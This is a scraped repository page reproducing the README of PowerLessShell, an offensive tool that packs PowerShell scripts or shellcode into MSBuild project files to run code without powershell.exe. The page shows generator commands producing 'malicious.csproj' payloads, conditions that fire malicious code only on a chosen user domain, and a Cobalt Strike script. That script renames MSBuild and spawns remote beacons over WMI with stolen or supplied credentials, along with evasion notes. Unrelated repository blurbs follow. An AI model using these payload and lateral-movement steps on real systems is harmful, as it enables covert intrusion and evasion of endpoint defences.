Run PowerShell command without invoking powershell.exe

Related tags

Deep LearningPowerLessShell
Overview

PowerLessShell

PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.

MSBuild conditions

MSBuild support condition that can be used to avoid running code if the condition is not met.

<Target Name="x" Condition="'$(USERDOMAIN)'=='RingZer0'">

The malicious code will only be executed if the current user domain is "RingZer0"

Condition supports several other formats that can be used to create more conditional execution check.

<Target Name="x" Condition="'$(registry:HKEY_LOCAL_MACHINE\[email protected])'>='0'">

Property Functions also expose interesting data.

https://docs.microsoft.com/en-us/visualstudio/msbuild/property-functions

Usage

PowerLessShell use commandline argument to generate the final file.

$ python PowerLessShell.py -h
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
usage: PowerLessShell.py [-h] [-type TYPE] -source SOURCE -output OUTPUT
                         [-arch ARCH] [-condition CONDITION]

optional arguments:
  -h, --help            show this help message and exit
  -type TYPE            Payload type (shellcode/powershell) default to:
                        shellcode
  -source SOURCE        Path to the source file (raw shellcode or powershell
                        script)
  -output OUTPUT        MSBuild output filename
  -arch ARCH            Shellcode architecture (32/64) default to: 32
  -condition CONDITION  XML Compiling condition default (Check for USERDOMAIN)
                        default is: none

Generating a powershell payload

$ python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
Generating the msbuild file using include/template-powershell.csproj as the template
File 'malicious.csproj' created
Process completed

Generating a shellcode payload

$ python PowerLessShell.py -source shellcode.raw -output malicious.csproj
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
Generating the msbuild file using include/template-shellcode.csproj as the template
File 'malicious.csproj' created
Process completed

Generating a 64 bits shellcode payload

$ python PowerLessShell.py -source shellcode64.raw -output malicious.csproj -arch 64
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
Generating the msbuild file using include/template-shellcode.csproj as the template
Generating a payload for a 64 bits shellcode! Don't forget to use the 64 bits version of msbuild.exe
File 'malicious.csproj' created
Process completed

Cobalt Strike Aggressor script (wmi_msbuild.cna)

By Alyssa (ramen0x3f) and MrT-F

Set Up

  • Either copy PowerLessShell folder to [cobalts working dir]/PowerLessShell or make note of path
  • If you didn't copy it to the Cobalt directory: edit the $pls_path variable in this file to point to PowerLessShell
  • Load script into Cobalt Strike

Usage

check_msbuild -target TARGET   		Verify .NET 4.0.30319 is installed (should see "Status OK")
	[-user user] [-pass pass]		Windows 7 has .NET 4.0.30319 after 3 reboots and 4 Windows update cycles

rename_msbuild -target TARGET 		Copy MSBuild.exe. 
	-msbuild newname 
 	[-path C:\new\path] 		Default - C:\Users\Public\
	[-user domain\username]		Specifying user/pass spawns cmd on remote host.
 	[-pass password]			

wmi_msbuild -target TARGET 		 	Spawn new beacon. 
         -listener LISTENER
	[-payload new_file]		 	Default - [a-zA-Z].tmp
	[-directory new_dir]			Default - C:\Users\Public\
	[-msbuild alt_msbuild_location] 	
	[-user USERNAME] [-pass PASSWORD]	
	[-manualdelete]				Switch doesn't auto delete payload.

OpSec Notes

Spawns cmd.exe on the target system if

  • ManualDelete switch is not set
  • rename_msbuild is run with a username/password specified

Credit

Mr.Un1k0d3r RingZer0 Team 2017

Owner
Mr.Un1k0d3r
Mostly Red Team tools for penetration testing. My patreon https://patreon.com/MrUn1k0d3r
Mr.Un1k0d3r
GitHub Repository
A proof of concept ai-powered Recaptcha v2 solver

Recaptcha Fullauto I've decided to open source my old Recaptcha v2 solver. My latest version will be opened sourced this summer. I am hoping this proj

Nate 60 Dec 20, 2022
On Uncertainty, Tempering, and Data Augmentation in Bayesian Classification

Understanding Bayesian Classification This repository hosts the code to reproduce the results presented in the paper On Uncertainty, Tempering, and Da

Sanyam Kapoor 18 Nov 17, 2022
This repository contains the code for the CVPR 2020 paper "Differentiable Volumetric Rendering: Learning Implicit 3D Representations without 3D Supervision"

Differentiable Volumetric Rendering Paper | Supplementary | Spotlight Video | Blog Entry | Presentation | Interactive Slides | Project Page This repos

697 Jan 06, 2023
Official implementation of the ICLR 2021 paper

You Only Need Adversarial Supervision for Semantic Image Synthesis Official PyTorch implementation of the ICLR 2021 paper "You Only Need Adversarial S

Bosch Research 272 Dec 28, 2022
Code for "SRHEN: Stepwise-Refining Homography Estimation Network via Parsing Geometric Correspondences in Deep Latent Space"

SRHEN This is a better and simpler implementation for "SRHEN: Stepwise-Refining Homography Estimation Network via Parsing Geometric Correspondences in

1 Oct 28, 2022
Camera Distortion-aware 3D Human Pose Estimation in Video with Optimization-based Meta-Learning

Camera Distortion-aware 3D Human Pose Estimation in Video with Optimization-based Meta-Learning This is the official repository of "Camera Distortion-

Hanbyel Cho 12 Oct 06, 2022
Resources for the Ki testnet challenge

Ki Testnet Challenge This repository hosts ki-testnet-challenge. A set of scripts and resources to be used for the Ki Testnet Challenge What is the te

Ki Foundation 23 Aug 08, 2022
Manifold Alignment for Semantically Aligned Style Transfer

Manifold Alignment for Semantically Aligned Style Transfer [Paper] Getting Started MAST has been tested on CentOS 7.6 with python = 3.6. It supports

35 Nov 14, 2022
Código de um painel de auto atendimento feito em Python.

Painel de Auto-Atendimento O intuito desse projeto era fazer em Python um programa que simulasse um painel de auto atendimento, no maior estilo Mac Do

Calebe Alves Evangelista 2 Nov 09, 2022
A flexible submap-based framework towards spatio-temporally consistent volumetric mapping and scene understanding.

Panoptic Mapping This package contains panoptic_mapping, a general framework for semantic volumetric mapping. We provide, among other, a submap-based

ETHZ ASL 194 Dec 20, 2022
PyTorch implementation of paper: HPNet: Deep Primitive Segmentation Using Hybrid Representations.

HPNet This repository contains the PyTorch implementation of paper: HPNet: Deep Primitive Segmentation Using Hybrid Representations. Installation The

Siming Yan 42 Dec 07, 2022
Action Recognition for Self-Driving Cars

Action Recognition for Self-Driving Cars This repo contains the codes for the 2021 Fall semester project "Action Recognition for Self-Driving Cars" at

VITA lab at EPFL 3 Apr 07, 2022
A Python library that enables ML teams to share, load, and transform data in a collaborative, flexible, and efficient way :chestnut:

Squirrel Core Share, load, and transform data in a collaborative, flexible, and efficient way What is Squirrel? Squirrel is a Python library that enab

Merantix Momentum 249 Dec 07, 2022
Attention-based Transformation from Latent Features to Point Clouds (AAAI 2022)

Attention-based Transformation from Latent Features to Point Clouds This repository contains a PyTorch implementation of the paper: Attention-based Tr

12 Nov 11, 2022
2.86% and 15.85% on CIFAR-10 and CIFAR-100

Shake-Shake regularization This repository contains the code for the paper Shake-Shake regularization. This arxiv paper is an extension of Shake-Shake

Xavier Gastaldi 294 Nov 22, 2022
Multi-agent reinforcement learning algorithm and environment

Multi-agent reinforcement learning algorithm and environment [en/cn] Pytorch implements multi-agent reinforcement learning algorithms including IQL, Q

万鲲鹏 7 Sep 20, 2022
Self-Learning - Books Papers, Courses & more I have to learn soon

Self-Learning This repository is intended to be used for personal use, all rights reserved to respective owners, please cite original authors and ask

Achint Chaudhary 968 Jan 02, 2022
Source code for CAST - Crisis Domain Adaptation Using Sequence-to-sequence Transformers (Accepted to ISCRAM 2021, CorePaper).

Source code for CAST: Crisis Domain Adaptation UsingSequence-to-sequenceTransformers (Paper, BibTeX, Accepted to ISCRAM 2021, CorePaper) Quick start D

Congcong Wang 0 Jul 14, 2021
:boar: :bear: Deep Learning based Python Library for Stock Market Prediction and Modelling

bulbea "Deep Learning based Python Library for Stock Market Prediction and Modelling." Table of Contents Installation Usage Documentation Dependencies

Achilles Rasquinha 1.8k Jan 05, 2023
MEDS: Enhancing Memory Error Detection for Large-Scale Applications

MEDS: Enhancing Memory Error Detection for Large-Scale Applications Prerequisites cmake and clang Build MEDS supporting compiler $ make Build Using Do

Secomp Lab at Purdue University 34 Dec 14, 2022